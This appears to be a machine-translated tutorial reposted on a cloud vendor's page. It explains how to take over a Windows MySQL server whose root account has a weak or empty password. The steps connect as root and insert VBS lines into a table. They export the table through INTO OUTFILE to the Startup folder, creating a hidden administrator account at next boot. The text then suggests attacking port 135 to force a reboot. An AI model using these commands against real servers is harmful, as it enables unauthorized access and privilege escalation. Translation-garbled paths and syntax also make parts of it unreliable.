MySQL user root password is a weak password attack

Source: Internet
Author: User
Tags insert mysql
Mysql| attack 1, connect to each other MySQL server

Mysql-u root-h 192.168.0.1

Mysql.exe This program is in the bin directory where you have MySQL installed

2. Let's take a look at some of the databases in the server

Mysql>show databases;

MySQL default installation will have MySQL, test these two databases, if you see that there are other databases that is the user-built database.

3, let us enter the database

Mysql>use test;

We're going to go into the test database.

4. See what data tables we get into the database

Mysql>show tables;

By default, no table exists in test.

The following are the key parts

5. Create a new table under test database;

Mysql>create Table A (cmd text);

Well, we created a new table named A, which only holds one field in the table, the field name is cmd, and the text.

6, insert the content in the table

Mysql>insert into a values ("Set Wshshell=createobject (" "Wscript.Shell") ");

Mysql>insert into a values ("A=wshshell.run (" "cmd.exe/c net User 1 1/add" ", 0)");

Mysql>insert into a values ("B=wshshell.run (" "Cmd.exe/c net localgroup Administrators 1/add" ", 0)");

Note the double quotes and parentheses and the "0" in the back must be entered! We will use these three commands to create a VBS script!

7, okay, now let's see what's in Table A.

Mysql>select * from A;

We will see that there are three rows of data in the table, that is, what we just typed, confirm what you typed, and we'll come to the next step.

8, the output table is a VBS script file

Mysql>select * from a into outfile "c:\\docume~1\\alluse~1\\" start "menu \ \ program \ Start \\a.vbs";

We entered the contents of our table into the Startup group, is a script file of VBS! Note the "\" symbol.

9, see this everyone must know, is the use of MySQL output an executable file. Why not bat, because the start of the runtime will have a clear DOS window out, and the VBS script can completely hide the window without error prompts! Originally, there should be a sentence after the completion of the script automatically deleted this script, but the Chinese directory is really unable to deal with, only to forget! All right, find a tool to attack 135 and let the server reboot, and in a few minutes you'll be the administrator.



Related Article

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.